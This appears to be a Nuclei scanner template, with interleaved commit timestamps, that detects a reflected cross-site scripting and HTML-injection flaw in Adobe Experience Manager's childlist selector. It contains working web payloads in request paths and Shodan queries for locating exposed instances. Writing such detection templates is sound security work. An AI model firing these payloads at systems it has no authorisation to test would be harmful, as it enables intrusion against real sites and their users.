2023-01-15 13:29:59 +00:00
id : aem-xss-childlist
info :
2023-01-16 08:07:20 +00:00
name : Adobe Experience Manager 'Childlist selector' - Cross-Site Scripting
2023-01-15 13:29:59 +00:00
author : theabhinavgaur
severity : medium
description : |
Adobe Experience Manager contains a cross-site scripting vulnerability via requests using the selector childlist when the dispatcher does not respect the content-type responded by AEM and flips from application/json to text/html. As a consequence, the reflected suffix is executed and interpreted in the browser.
metadata :
verified : true
shodan-query :
- http.title:"AEM Sign In"
- http.component:"Adobe Experience Manager"
tags : xss,aem,adobe
requests :
- method : GET
path :
2023-01-16 17:35:08 +00:00
- "{{BaseURL}}/{{rand_base(4)}}<img src=x data'a'onerror=alert(domain)>.childrenlist.html"
- "{{BaseURL}}/{{rand_base(4)}}<br><br>please%20authenticate<br><br>.childrenlist.html"
2023-01-15 13:29:59 +00:00
2023-01-16 17:35:08 +00:00
stop-at-first-match : true
matchers-condition : or
2023-01-15 13:29:59 +00:00
matchers :
- type : word
part : body
2023-01-16 17:35:08 +00:00
name : xss
2023-01-15 13:29:59 +00:00
words :
- '<img src="x" data onerror="alert(domain)"/>'
2023-01-16 17:35:08 +00:00
- 'data-coral-columnview-id'
condition : and
2023-01-16 08:07:20 +00:00
- type : word
part : body
2023-01-16 17:41:46 +00:00
name : html_injection
2023-01-16 08:07:20 +00:00
words :
2023-01-16 17:35:08 +00:00
- '<br /><br />please authenticate<br /><br />'
2023-01-15 13:29:59 +00:00
- 'data-coral-columnview-id'
2023-01-16 17:35:08 +00:00
condition : and
2023-01-16 17:41:46 +00:00
- type : word
part : content_type
words :
- 'text/html'
- type : status
status :
- 200